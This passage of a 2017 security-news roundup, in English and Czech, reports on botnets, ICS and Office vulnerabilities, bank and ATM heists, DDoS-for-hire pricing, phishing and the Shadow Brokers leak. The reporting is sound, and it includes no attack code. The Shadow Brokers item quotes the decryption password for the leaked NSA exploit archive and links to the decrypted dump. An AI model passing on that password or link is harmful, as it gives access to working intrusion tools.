The bot then receives a list of domain access credentials (formatted as login:password@domain) that it then probes for access, and ESET says that different bots try different login credentials for the same site. Further, to avoid being blocked, each bot only tries a single login per site and moves to the next domain.
“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET reveals. They also note that the XML-RPC API (particularly, the wp.getUsersBlogs API) of WordPress is used in the attack.
The bot also has the libtorrent library integrated, and is designed to become a seeder by downloading a binary file and creating the torrent. However, it appears that not all bots in the network perform all of these functions, as some are only used as web crawlers, others only attack the XML-RPC API, while others do both. Not all bots become seeders either.
“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs,” the security researchers explain.
Consisting of over 20,000 infected computers, Sathurbot is believed to have been active since at least June 2016.
Flaw in Popular Framework Exposes Many ICS Devices to Attacks
10.4.2017 securityweek ICS
Hundreds of thousands of Industrial Internet of Things (IIoT) and industrial control systems (ICS) products could be exposed to hacker attacks due to critical vulnerabilities affecting a widely used piece of software from Germany-based 3S-Smart Software Solutions.
The flaws affect the CODESYS automation software for developing and engineering controller applications, specifically the Web Server component of the CODESYS WebVisu visualization software. The issues have been fixed by 3S-Smart Software Solutions, but experts believe it will take some time until the patch reaches all vulnerable devices.
The security holes, discovered by researchers at industrial cybersecurity startup CyberX, affect CODESYS Web Server 2.3 and prior, and they have been addressed with patch version 1.1.9.18. ICS-CERT has published an advisory describing the flaws.
One of the vulnerabilities, tracked as CVE-2017-6027, allows an attacker to upload arbitrary files to the CODESYS Web Server by sending a specially crafted request. Exploitation of the flaw can lead to arbitrary code execution.
The second vulnerability, identified as CVE-2017-6025, is a stack-based buffer overflow that exists because the size of strings sent to functions that handle the XML are not properly checked before they are copied to memory. An attacker can exploit this weakness to crash the application or execute arbitrary code.
Learn More at SecurityWeek's 2017 Singapore ICS Cyber Security Conference
According to CyberX, there are several possible exploitation scenarios. For example, an attacker can use a search engine such as Shodan to identify vulnerable devices that are directly connected to the Internet, and then remotely exploit the vulnerabilities.
Another scenario described by the security firm involves a malicious actor delivering a piece of malware that exploits the vulnerabilities via a USB drive. A remote attacker can also compromise the targeted organization’s IT network and from there move onto the OT network, where they would have access to vulnerable devices.
“Attackers could exploit the vulnerabilities to install back-doors in order to perform industrial cyberespionage, deploy ransomware, and execute cyber-sabotage operations to disrupt production or cause catastrophic safety failures and environmental damage,” researchers warned in a blog post.
CODESYS software is used in hundreds of PLCs and other products from companies worldwide. According to the vendor, more than a million devices that use CODESYS software are sold every year and, as of mid-2016, over half of the products listed in the company’s device directory had been using the vulnerable component.
CyberX said CODESYS was quick to develop a patch, which the security firm has tested and validated. However, vulnerabilities in third-party components can be problematic as it can take a lot of time until patches reach end-users.
“Each device manufacturer must first apply the CODESYS patch to their own code, then recompile the firmware, and then send a firmware update to their end-users. The CODESYS patch can’t be installed by end-user organizations,” CyberX explained. “Most devices require firmware to be ‘reflashed,’ which is a lengthier and more complicated process than standard software updates on your phone or PC.”
This is not the first time a vulnerability affecting a third-party component has exposed devices from numerous vendors. Back in 2015, researchers disclosed a serious flaw in a CodeWrights library used by many manufacturing and technology companies for HART-based field devices.
Finanční útoky skupiny Lazarus stály 81 milionů dolarů
9.4.2017 SecurityWorld Kriminalita
Po více než ročním vyšetřování uveřejnila společnost Kaspersky Lab výsledky svého šetření aktivit skupiny Lazarus. Jde o nechvalně známou hackerskou skupinu, která pravděpodobně stála za krádeží 81 milionů dolarů z Centrální bangladéšské banky v roce 2016.
Finanční útoky skupiny Lazarus stály 81 milionů dolarů
Díky provedené forenzní analýze stop, které skupina zanechala v bankách v jihovýchodní Asii a Evropě, získala Kaspersky Lab ucelený obrázek o tom, jaké zákeřné nástroje skupina využívá. Společnost také odhalila, jaké postupy skupina volí pro útoky na finanční instituce, kasina, softwarové vývojáře pro investiční společnosti a krypto-měnové obchody po celém světě. Tyto znalosti pomohly odhalit a překazit minimálně další dva útoky, které měly za cíl ukrást finančním institucím velké peněžní obnosy.
V únoru loňského roku se pokusila (v té době neznámá) skupina hackerů ukrást 851 milionů dolarů z Centrální bangladéšské banky, přičemž se jí podařilo převést 81 milionů dolarů. Tento čin představuje jednu z největších a nejúspěšnějších kybernetických krádeží současnosti.
Následné vyšetřování, do kterého se zapojili odborníci z mnoha IT bezpečnostních společností včetně Kaspersky Lab, odhalilo, že by nejpravděpodobnějším pachatelem mohla být skupina Lazarus. Tato neblaze proslulá kyberšpionážní a sabotážní skupina má na svědomí sérii pravidelných ničivých útoků. Od roku 2009 se podepsala pod útoky na výrobní podniky, média a finanční instituce přinejmenším v 18 státech po celém světě.
Ačkoliv se skupina po útoku v Bangladéši na několik měsíců odmlčela, nezahálela ve svých aktivitách. Připravovala se na další akci cílící opět na finanční krádeže v bankách. V té době měli navíc kyberzločinci již vytvořené kontakty v jedné z finančních institucí v Jihovýchodní Asii. Plány jim však překazilo následné vyšetřování.
Na několik následujících měsíců se proto opět stáhli a rozhodli se pro změnu taktiky – své operace přesunuli do Evropy. Nicméně i zde byly jejich pokusy přerušeny detekčním bezpečnostním softwarem Kaspersky Lab a také díky rychlé reakci, forenzní analýze a reverznímu inženýrství, na kterém se podíleli top odborníci z této společnosti.
Na základě výsledků forenzní analýzy těchto útoků byli odborníci Kaspersky Lab schopni zrekonstruovat modus operandi skupiny Lazarus.
Počáteční infikace: K prolomení dojde prostřednictvím jediného systému uvnitř banky – buď na základě zranitelného kódu se vzdáleným přístupem (např. na webovém serveru) nebo skrz „watering hole attack“ umožněný exploitem na neškodných stránkách. Jakmile některý zaměstnanec banky takovouto stránku navštíví, počítač uchvátí malware, který stáhne další komponenty.
Vybudování základny: Poté se kyberzločinci rozšíří do dalších bankovních systémů a nasadí persistentní backdoors – malware jim umožní přijít a odejít kdykoliv chtějí.
Interní průzkum: V následujících dnech a týdnech skupina poznává síťové prostředí a identifikuje cenné zdroje. Takovým zdrojem může být záložní server, kam se ukládají autentifikační informace, mailový server nebo celý řadič domény s přístupem do každé části společnosti. V neposlední řadě mohou být cenným zdrojem servery ukládající a zpracovávající záznamy o finančních transakcích.
Útok a krádež: Na závěr nasadí speciální malware schopný obejít bezpečnostní mechanismy interního finančního softwaru a provedou jménem banky podvodné transakce.
Útočníci a jejich oběti
Experti Kaspersky Lab strávili vyšetřováním tohoto případu týdny práce. Nicméně kyberzločinci mohli fungovat bez povšimnutí spoustu měsíců. Například během vyšetřování incidentu v Jihovýchodní Asii experti zjistili, že hackeři mohli do sítě banky proniknout už 7 měsíců před okamžikem, kdy bezpečnostní tým banky požádal o pomoc s řešením případu. Ve skutečnosti měla skupina přístup do bankovní sítě ještě před incidentem v Bangladéši.
Na základě dat Kaspersky Lab z prosince 2015 se části malwaru vztahující se ke skupině Lazarus objevily ve finančních institucích a kasinech, u softwarových vývojářů pro investiční společnosti či u krypto-měnových obchodů v Koreji, Bangladéši, Indii, Vietnamu, Indonésii, Kostarice, Malajsii, Polsku, Iráku, Etiopii, Keni, Nigérii, Uruguay, Gabonu, Thajsku a několika dalších státech. Poslední zaznamenaná aktivita byla společností Kaspersky Lab detekována v březnu tohoto roku, což značí, že útočníci nemají v plánu přestat.
I když si útočníci dávali velký pozor, aby nezanechali žádnou stopu, na jednom serveru, který napadli v rámci jiné kampaně, udělali vážnou chybu. Během přípravy na akci byl server nakonfigurován jako řídící a kontrolní centrum malwaru. V den konfigurace přicházelo první spojení z několika VPN/proxy serverů indikujících testovací fázi pro C&C sever. Zároveň ale došlo i k jednomu krátkému spojení, které pocházelo z velmi vzácné IP adresy pocházející ze Severní Koreji.
Podle expertů to může mít několik vysvětlení:
Útočníci se připojili z dané IP adresy v Severní Koreji.
Byla to někým jiným pečlivě naplánovaná krycí operace.
Někdo ze Severní Koreji omylem navštívil příkazové a kontrolní URL.
Skupina Lazarus masivně investuje do nových variant svého malwaru. Několik měsíců se její členové snažili vytvořit zákeřnou sadu nástrojů, která by byla bezpečnostními řešeními nedetekovatelná. Pokaždé když se o to ale pokusili, byli odhaleni specialisty Kaspersky Lab, kteří identifikovali unikátní charakteristické rysy jejich kódu. Na jejich základě pak následně mohli sledovat nové případy. V současnosti se kyberzločinci opět odmlčeli, což pravděpodobně znamená, že pracují na vylepšení svého arzenálu.
Podvodníci mají nový trik. Neřeknou nic a na svou oběť čekají
9.4.2017 Novinky/Bezpečnost Phishing
S novým trikem přišli v posledních dnech počítačoví piráti, kteří se vydávají za zaměstnance České spořitelny. Oběť se totiž snaží napálit tak, že v podvodném e-mailu nesdělí zhola nic. Před novou hrozbou varovali přímo zástupci spořitelny.
„Upozorňujeme na novou podobu podvodného e-mailu, kterou jsme v posledních dnech zaznamenali. Zpráva vzbuzuje dojem, že byla zaslána z České spořitelny,“ uvedli zástupci banky.
Podvodný e-mail skutečně na první pohled vypadá, jako by byl odeslán z adresy csas.cz, kterou banka skutečně používá. Zmiňovanou doménu podvodníci jednoduše zfalšují, méně pozorní uživatelé se ale mohou nechat snadno napálit.
FOTO: Česká spořitelna
Pozor na přílohu
Proti předešlým podvodným zprávám je tento spam zajímavý především tím, že útočníci neříkají zhola nic. Text obsahuje pouze zprávu „Připojený FYI“ a podpis údajné pracovníka spořitelny. FYI je zkratka anglického „For Your Information“, tedy „Pro Vaší informaci“.
Méně ostražití jedinci se tak mohou snadno nechat zmást a kliknout ze zvědavosti na přiloženou přílohu. „Jejím cílem je pouze infikování klientova počítače malwarem. Důrazně proto varujeme před jakoukoliv reakcí na e-maily s podezřelým obsahem,“ varovali zástupci spořitelny.
Kybernetičtí podvodníci tak bez nadsázky neřeknou vůbec nic a podobně jako rybáři vyčkávají, až se jejich oběť nachytá na hozenou návnadu.
Ihned kontaktovat banku
„Věnujte zvýšenou pozornost e-mailovým zprávám, které dostáváte, především pak přílohám a aktivním odkazům, které tyto zprávy obsahují. V případě jakýchkoliv pochybností nás kontaktujte na bezplatném telefonním čísle 800 207 207. Pokud jakýkoliv podvodný e-mail odhalíte, pošlete nám ho prosím na adresu phishing@csas.cz,“ stojí v doporučení banky.
Podvodné zprávy se prozatím objevily pouze pod hlavičkou České spořitelny. Není nicméně vyloučeno, že stejnou taktiku budou v dohledné době zkoušet kyberzločinci také v přestrojení za bankéře jiného finančního institutu.
Obezřetní by tak měli být před podobnými nevyžádanými e-maily také klienti dalších bank.
Kolik stojí DDoS? Základní přijde na pár dolarů, pokročilý na stovky
4. 4. 2017 Root.cz Počítačový útok
DDoS patří stále mezi nejrozšířenější druhy útoků a objemy neustále rostou. Důvody mohou být různé, od pouhého vandalismu až k vydírání. Zájem o ně je velký a jsou účinné. Není divu, že se dají pronajmout jako služba.
DDoS je velmi oblíbeným nástrojem kyberzločinu, původně šlo o nástroj pomsty, aktivizmu nebo prosté zábavy. Postupně se jeho použití zaměřilo na nebezpečné vydírání, kdy útočníci osloví konkrétní společnost a požadují platbu. V opačném případě vyhrožují zahájením DDoS útoků a odstavením služeb. Zejména provozovatelé e-shopů se podobné hrozby děsí, především v období Vánoc.
Obětí se může stát vlastně kdokoliv, provést takový útok je velmi snadné, proto je to i levné. Podobně jako je možné si pronajmout celý botnet nebo ransomware, je možné si pronajmout DDoS jako službu. Pokud nemá cílová síť dobře navrženou obranu, je možné ji takto velmi snadno (a levně) úplně odstavit.
DDoS jako služba
Společnost Kaspersky zveřejnila analýzu současných služeb, které nabízí pronájem DDoS útoků. Společného mají především to, že se snaží svým zákazníkům vycházet maximálně vstříc. Vše je možné ovládat pomocí webového rozhraní, služby mají různé cenové programy a věrným zákazníkům dokonce nabízejí různé odměny. Jde tak vlastně o byznys velmi podobný třeba pronájmu VPS, jen se v tomto případě pronajímají útoky.
Autor: Kaspersky
Ruské fórum nabízející útoky od 50 dolarů za den
Některé služby se dokonce chlubí počtem uživatelů a množstvím útoků, které už provedly nebo ten den provádějí. I když je jasné, že čísla mohou být zfalšovaná, aby se služba lépe prezentovala potenciálním zákazníkům.
Autor: Kaspersky
Desítky tisíc uživatelů a stovky tisíc útoků
Výjimkou nejsou ani podrobné statistiky jednotlivých druhů útoků včetně přehledných grafů vysvětlujících popularitu různých variant.
Autor: Kaspersky
Jaké typy útoků u nás nejvíc děláme
Podle čeho se počítá cena
Různé služby se snaží své zákazníky nalákat na výhody či vlastností, které jinde nenajdou. Opět stejně, jako je tomu i u běžných legálních podnikání. Kaspersky uvádí čtyři různé oblasti, které mohou výrazně ovlivnit výslednou cenu útoku.
Specifické cíle – služba se zaměřuje například na vládní servery. Za útok na takový cíl si ale může vyžádat výrazně vyšší částku, stejně jako za sítě s lepší ochranou. Provozovatel totiž musí filtry prozkoumat a vymyslet způsob, jak je obejít.
Zdroje útoku – různé zdroje útoků stojí různé peníze. Například útok přicházející z tisícovky napadených bezpečnostních kamer bude levnější než využití botnetu sestaveného ze stovky napadených serverů. Vytvořit botnet ze špatně zabezpečených IoT zařízení je výrazně jednodušší a tedy i levnější.
Různé scénáře útoku – pokud si budete chtít nechat útok ušít na míru nebo budete požadovat něco specifického, zaplatíte více. Příkladem může být kombinovaný útok nebo rychlé změny útočných vektorů během krátkých časových oken.
Průměrná cena v konkrétní zemi – také tady funguje konkurenční boj, takže služby spolu bojují o zákazníky svou cenovou politikou. Záleží také například na kupní síle místních uživatelů, takže podobná služba v USA bude stát výrazně více než v Rusku.
Dostupné je také účtování útoků po sekundách bez ohledu na další parametry. Pětiminutový DDoS tak může stát například 5 dolarů, hodinová varianta vás vyjde na 90 dolarů. Ve všech případech má botnet kapacitu 125 Gbps.
Autor: Kaspersky
Plaťte za délku útoku
Část kyberzločinců navíc nechce příliš odkrývat detailní specifikace svých řešení, proto nabízí jen obecné údaje a účtují pak jen za dobu běhu útoku. Nedozvíte se, jaký druh botnetu používají ani jak jsou napadené systémy připojené.
Některé ceníky naopak zohledňují druh provozu, který potřebujete na oběť poslat: SYN-flood, UDP-flood, NTP-amplification nebo kombinaci různých paketů zároveň. Útok je možné naplánovat na různých síťových vrstvách a útočit na infrastrukturu nebo konkrétní služby.
Autor: Kaspersky
Ceník služby, která umožňuje doslova na pár kliknutí zahájit útok
Jiné služby se chlubí možností velmi rychlého přepnutí útočného vektoru. Pokud zákazník zjistí, že jeho oběť je odolná například proti SYN-floodu, může prostým kliknutím přepnout na jiný druh útoku, na který není oběť tak dobře připravená.
Autor: Kaspersky
Další ceník zaměřený na délku trvání útoku
Zvláštní sazby jsou pak účtovány za dobře chráněné sítě, které používají DDoS ochrany. Útok na takovou síť přijde třeba na 400 dolarů za den. Provozovatel služby totiž musí být vynalézavější a musí se snažit proniknout obranou cílové sítě.
Stejně tak se platí výrazně více za útoky na vládní servery. Ty jsou totiž často pod ochranou bezpečnostních složek a provozovatelé botnetů nechtějí odhalit napadené stroje. Buďto proto na podobné cíle vůbec neútočí nebo na ně mají speciální tarify s vyšší cenou.
Zajímavé také je, že některým provozovatelům nedělá vůbec problém kromě organizování DDoS útoků nabízet také ochrany proti nim.
Autor: Kaspersky
Zaútočíme nebo vás ochráníme
Příklad financování útoku
Kaspersky uvádí také konkrétní příklad financování takového útoku. V případě zneužití cloudu od Amazonu stojí pronájem jednoho virtuálního serveru tisíciny dolaru za hodinu provozu. Pokud jich útočník potřebuje padesát, dostává se na necelý půldolar za hodinu provozu. Při započtení dalších nákladů stojí útok na nákladech asi čtyři dolary.
Autor: Kaspersky
Ceník virtuálních serverů u Amazonu
Pronájem botnetu čítající tisícovku běžných počítačů vyjde na sedm dolarů za hodinu. Za podobný útok se ovšem platí desítky dolarů, z čehož je patrné, že útočníci provozující DDoS služby mají z každého realizovaného útoku velmi slušný příjem.
Uživatelé těchto služeb vědí přesně, co za své peníze dostávají. Krátký útok stojí jednotky dolarů a může oběť významně poškodit. Pokud například e-shop objedná útok na svého konkurenta, může jej poškodit dvakrát: uživatelé nemohou nakoupit a přejdou v ideálním případě k němu. Pokud bude navíc útok trvat třeba celý den, mohou být ztráty obrovské.
Provozovatelé těchto služeb se snaží stále hledat co nejlevnější způsob budování botnetů, nejnovějším trendem jsou různá IoT zařízení jako kamery, televize nebo mobilní telefony. Pokud existují bezpečnostní mezery v podobných zařízeních, útočníci je dřív nebo později najdou a zneužijí. Čím snadnější a levnější pro ně bude botnet postavit, tím lépe.
Jde tu totiž v první řadě o peníze, náklady jsou poměrně nízké a vydírání se útočníkům vyplácí. Proto roste popularita DDoS služeb. V budoucnu tak pravděpodobně můžeme očekávat jen další pokles cen a zvýšení dostupnosti i frekvence podobných služeb.
Beware of an Unpatched Microsoft Word 0-Day Flaw being Exploited in the Wild
9.4.2017 thehackernews Vulnerebility
It's 2017, and opening a simple MS Word file could compromise your system.
Security researchers are warning of a new in-the-wild attack that silently installs malware on fully-patched computers by exploiting a serious — and yet unpatched — zero-day vulnerability in all current versions of Microsoft Office on fully-patched PCs.
The Microsoft Office zero-day attack, uncovered by researchers from security firms McAfee and FireEye, starts simply with an email that attaches a malicious Word file containing a booby-trapped OLE2link object.
When opened, the exploit code gets executed and makes a connection to a remote server controlled by the attacker, from where it downloads a malicious HTML application file (HTA) that's disguised as a document created in Microsoft's RTF (Rich Text Format).
The HTA file then gets executed automatically with attackers gaining full code execution on the victim’s machine, downloading additional payloads from "different well-known malware families" to take over the victim's PC, and closing the weaponized Word file.
Zero-Day Attack Works on All Windows OS — Even Windows 10
According to researchers, this zero-day attack is severe as it gives the attackers the power to bypass most exploit mitigations developed by Microsoft, and unlike past Word exploits seen in the wild, it does not require victims to enable Macros.
Due to these capabilities, this newly discovered attack works on all Windows operating systems even against Windows 10, which is believed to be Microsoft's most secure operating system to date.
Besides this, the exploit displays a decoy Word document for the victims to see before terminating in order to hide any sign of the attack.
"The successful exploit closes the bait Word document and pops up a fake one to show the victim," McAfee researchers wrote in a blog post published Friday. "In the background, the malware has already been stealthily installed on the victim's system."
"The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office."
Microsoft is aware of the zero-day flaw as the researchers say they responsibly disclosed the issue to the company after detecting active attacks leveraging this unpatched flaw back in January this year.
FireEye disclosed the details of the vulnerability a day after McAfee went public with the flaw.
The next scheduled Microsoft's release of security updates is this Tuesday, so it's highly unlikely the company will be able to deliver a patch before that day.
How to Protect Yourself against this Attack?
Since the attack works on fully patched systems, users are highly advised to follow the below recommendations to mitigate such attacks:
Do not open or download any suspicious Word files that arrive in an e-mail, even if you know the sender until Microsoft releases a patch.
Since the attack does not work when a malicious document is viewed in Office Protected View feature, users are advised to enable this feature to view any Office documents.
Always keep your system and antivirus up-to-date.
Regularly backup your files in an external hard-drive.
Disabling Macros does not offer any protection, but yet users are advised to do so in an attempt to protect themselves against other attacks.
Always beware of phishing emails, spams, and clicking the malicious attachment.
ATMitch – Crooks stole $800,000 from 8 ATMs in Russia using Fileless Malware
9.4.2017 securityaffairs Virus
According to Kaspersky Lab, crooks have robbed at least 8 ATMs in Russia and stole $800,000 in just one night using a Fileless malware dubbed ATMitch.
According to experts at Kaspersky, hackers have robbed at least 8 ATMs in Russia and stole $800,000 in just one night.
The cyber heist caught the attention of security experts that analyzing the CCTV footage have noticed a man walking up to the ATM and collecting cash apparently without interacting with the machine.
Security teams at the affected banks haven’t found any evidence of the presence of a malware or any sign of an intrusion. Just one of the targeted banks reported having discovered two files containing malware logs on the ATM.
The experts have discovered the following strings in the log files:
“Take the Money Bitch!”
“Dispense Success.”
In February, malware at Kaspersky Labs reported that crooks hit over 140 enterprises, including banks, telecoms, and government organizations in 40 countries. The cybercriminals leveraged a ‘Fileless malware.’
Malicious code is directly injected into the memory of the infected machine and the malware executes in the system’s RAM.
“A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers.” reads the analysis published by Kaspersky.
The attack was first spotted by a bank’s security team that discovered a copy of the Meterpreter code, an in-memory component of the Metasploit framework, in a physical memory of a Microsoft domain controller (DC).
The experts at Kaspersky Lab tracked the threats as MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. The malware leverage PowerShell scripts within the Windows registry to load the Meterpreter code directly into memory, similar techniques leveraging on the PowerShell were already adopted by other malware in the wild.
Malware researchers believe that hackers that targeted the banks carried out the attacks with a Fileless malware.
During the recent Kaspersky Security Analyst Summit held in St. Maarten, security researchers Sergey Golovanov and Igor Soumenkov provided further details about their investigation on the ATM hacks against two Russian banks.
Experts have tracked the malware as ATMitch, it was first spotted in Russia and Kazakhstan, the malicious code is remotely installed and executed on ATMs via its remote administration module.
“The malware, which we have dubbed ATMitch, is fairly straightforward. Once remotely installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank, the malware looks for the “command.txt” file that should be located in the same directory as the malware and created by the attacker.” reads the analysis from Kaspersky.
The attackers connect the ATM via SSH tunnel, install the malicious code and use it to instruct the ATM to dispense cash.
Since Fileless malware leverages the existing legitimate tools on a machine to remotely send the command to dispense the money, an operation that is very quick, just a few seconds are enough to empty the ATM without leaving traces.
“The malware uses the standard XFS library to control the ATM. It should be noted that it works on every ATM that supports the XFS library (which is the vast majority).” states Kaspersky.
The experts highlighted that attackers used a sophisticated method to compromise the bank network an access to the ATM’s back-end panel.
To avoid triggering the alarm, attackers physically accessed the ATM by drilling a golf-ball sized hole in the front panel. The hole allows the attackers to access to the cash dispenser panel using a serial distributed control wire (SDC RS485 standard).
Kaspersky experts explained that the technique was discovered after the police arrested a man dressed as a construction worker while he was drilling into an ATM.
Malware researchers warn ATM manufacturer and banks that crooks across Russia and Europe have already used the ATM drill attack for cyber heists.
Researchers did not identify a specific criminal gang behind these ATM hacks, anyway, they noticed that the source code used in the attacks contains references to the Russian language.
Kaspersky has discovered many similarities with techniques used by the have discovered many similarities with techniques used by the Carbanak and GCMAN cyber gangs.
Millions of mobile phones and laptops potentially exposed to attack leveraging baseband zero-days
9.4.2017 securityaffairs Vulnerebility
The researcher Ralf Weinmann revealed that millions of mobile phones and laptops are potentially exposed to attack leveraging baseband zero-days he discovered.
The researcher Ralf-Phillip Weinmann, managing director at security firm Comsecuris, has disclosed a zero-day baseband vulnerability affecting Huawei smartphones, laptop WWAN modules, and IoT components.
Baseband is firmware used on smartphones to connect to cellular networks, to make voice calls, and transmit data.
An attacker can exploit baseband flaws to eavesdrop mobile communications, take over the device making calls and sending SMS messages to premium numbers or to exfiltrate data.
The expert revealed the flaw this week at the Infiltrate Conference, the vulnerability could be exploited by attackers to execute a memory-corruption attack against affected devices over the air.
Fortunately, the attack is quite difficult to conduct.
The baseband vulnerability resides in the HiSilicon Balong integrated 4G LTE modems. The Balong application processor is called Kirin, it is produced by the Hisilicon Technologies, a subsidiary of Huawei Technologies. The affected firmware is present in several Huawei Honor smartphones, including the P10, Huawei Mate 9, Honor 9, 7, 5c and 6.
Weinmann believes that millions of Honor smartphones could be exposed to the to attack.
Weinmann presented multiple baseband vulnerabilities found in the Kirin application processor.
The expert also revealed that many laptops produced by IT vendors leverage the HiSilicon Balong integrated modem, such as a number IoT devices.
“This baseband is much easier to exploit than other basebands. Why? I’m not sure if this was intentional, but the vendor actually published the source code for the baseband which is unusual,” Weinmann said. “Also, the malleability of this baseband implantation doesn’t just make it good for device experimenting, but also network testing.”
Weinmann speculates HiSilicon may have wrong released the Kirin source code as part of a developer tar archive associated with the Huawei H60 Linux kernel data.
Weinmann demonstrated several attack scenarios against mobile phones.
A first attack scenario presented by the researcher involves setting up a bogus base station using open-source software called OpenLTE that is used by an attacker to simulate a network operator. The attacker can send specially crafted packets over the air that trigger a stack buffer overflow in the LTE stack causing the phone crashing. Once the phone rebooted an attacker can gain persistence installing a rootkit.
In a second attack scenario, the attacker with a physical access to the phone and private key pair data would install malicious tools on the firmware.
“It requires key material that is stored both by the carrier and on the SIM card in order to pass the mutual authentication between the phone and the network. Without this key material, a base station cannot pose as a legit network towards the device.”
Weinmann used for its test his own VxWorks build environment using an evaluation version of VxWorks 7.0 that shipped with Intel Galileo several years ago. The expert explained that the existence of a Lua scripting interpreter running in the baseband gives him further offensive options.
Weinmann did not disclose the technical details to avoid threat actors in the wild will abuse his technology.
“I have chosen to only disclose lower-severity findings for now. Higher severity findings are in the pipeline.” Weinmann said.
Síť indických podvodníků vylákala z Američanů po telefonu stovky miliónů dolarů
9.4.2017 Novinky/Bezpečnost Kriminalita
Indické policii se podařilo zadržet šéfa sítě podvodných telefonistů, kteří se vydávali za pracovníky amerických vládních úřadů a vymámili z několika tisíc Američanů stovky miliónů dolarů. Skupina operovala z Bombaje a podle agentury Reuters policie v sobotu dopadla jejího bosse.
Sagar Thakkar byl nad ránem zadržen na bombajském letišti. Indická policie již dříve odhalila, že čtyřiadvacetiletý Thakkar žil okázalým životním stylem, vlastnil luxusní automobily a pobýval v pětihvězdičkových hotelech. Jeho zločinecký kruh telefonních operátorů totiž obral americké občany o více než 300 miliónů dolarů (7,5 miliardy korun).
Indičtí podvodníci působící v několika call centrech na periferiích Bombaje se po telefonu vydávali za pracovníky amerických úřadů, jako například Federální berní úřad IRS. Alespoň 15 000 Američanů hrozili pokutami, uvězněním či vyhoštěním, pokud vládě nesplatí fiktivní dluhy. Peníze od obětí byly následně podle zprávy amerického ministerstva spravedlnosti očišťovány tamními komplici, kteří často používali ukradené či falešné identity.
Detailní znalost systému
Podvodnou operaci fungující více než rok zastavila indická policie loni v říjnu po raziích na množství bombajských call center. Zadrženo bylo tehdy přes 700 podezřelých. Policejní komisař Param Bir Singh dnes na tiskové konferenci uvedl, že ve věci byly obviněny čtyři stovky osob, z nichž je asi desítka ve vazbě.
Follow
Maharashtra Today @todaymaharasht1
Sagar Thakkar alias ‘Shaggy’ arrested by Thane Police over call centre scam. - http://www.maharashtratoday.in/thane-call-centre-scam-police-arrest-aide-mastermind-sagar-thakkar-suspected-europe/19 …
8:51 AM - 8 Apr 2017
2 2 Retweets 1 1 like
zadržený Sagar Thakkar
Americké a indické úřady při vyšetřování spolupracují, avšak americká strana oznámila, že bude usilovat o vydání indických podvodníků do USA. Ministerstvo spravedlnosti Spojených států rovněž loni v říjnu v rámci kauzy obvinilo 60 osob na území USA i Indie ze spiknutí za účelem krádeže identity, vydávání se za činitele Spojených států, bankovní podvody a praní špinavých peněz.
Sagar Thakkar byl podle slov komisaře Singha obviněn v prosinci, když po říjnových raziích uprchl do Dubaje. Singh prý Thakkara vyslýchal a byl „ohromen jeho znalostmi amerického a indického systému”. Dodal, že čtyřiadvacetiletý Ind se ke své roli v podvodnické skupině přiznal.
The Shadow Brokers release more alleged NSA hacking tools and exploits
9.4.2017 securityaffairs BigBrothers
The Shadow Brokers hacking crew sent a message to President Trump commenting recent political events and released more alleged NSA hacking tools.
The Shadow Brokers is the mysterious group that in October 2016 claimed to have stolen a bunch of hacking tools used by the NSA for its operations.
At the end of October 2016, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.
The Equation group compromised these targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR. The Shadow Brokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC.
The first archive was containing roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.
The majority of files are at least three years old, meanwhile, the newest timestamp dating to October 2013.Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.A couple of weeks before the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.
In December 2016, the Shadow Brokers has changed the model of sale, it has put up the NSA’s hacking arsenal for direct sale on an underground website.
Back to the present, today the Shadow Brokers group released more alleged hacking tools and exploits that allegedly belong to the Equation Group.
The group has launched the bomb, it has finally released password for the encrypted dump of NSA files and anyone can access them.
The group shared the following password:
CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN
in a blog post on the Medium platform titled “Don’t Forget Your Base“
The post is an open letter to President Donald Trump, the group expressed its point of view on the Trump’s policy, it explicitly refers Goldman Sach, the air strike against Syria and removal of Steve Bannon from the National Security Council, among others.
“Respectfully, what the fuck are you doing? TheShadowBrokers voted for you. TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning “your base”, “the movement”, and the peoples who getting you elected.” reads the post.
A security expert that goes online with the Twitter handle x0rz, has uploaded all files after decryption on Github.
A close look at the archive revealed the existence of numerous tools that was developed to target specific platforms, including:
rpc.cmsd a remote root zero-day exploit for Solaris Unix-based operating system.
Follow
x0rz @x0rz
Solaris rpc.cmsd remote root exploit (TAO's EASYSTREET) #0day
3:42 PM - 8 Apr 2017
121 121 Retweets 101 101 likes
The NSA access insided the GSM network of the Pakistan’s mobile operator Mobilink.
Follow
x0rz @x0rz
NSA operators notes about their access inside 🇵🇰Pakistan Mobilink GSM network https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/doc/old/etc/user.mission.sicklestar.COMMON … #ShadowBrokers #EquationGroup #APT
5:41 PM - 8 Apr 2017
50 50 Retweets 48 48 likes
The NSA Tailored Access Operations team (TAO) used the TOAST framework to clean logs of Unix wtmp events.
Follow
x0rz @x0rz
TAO's TOAST framework used to clean Unix wtmp events, no logs no crime 😏 #opsec
4:50 PM - 8 Apr 2017
63 63 Retweets 68 68 likes
The Equation Group used the ElectricSlide tool to impersonate a Chinese browser with fake Accept-Language.
Follow
x0rz @x0rz
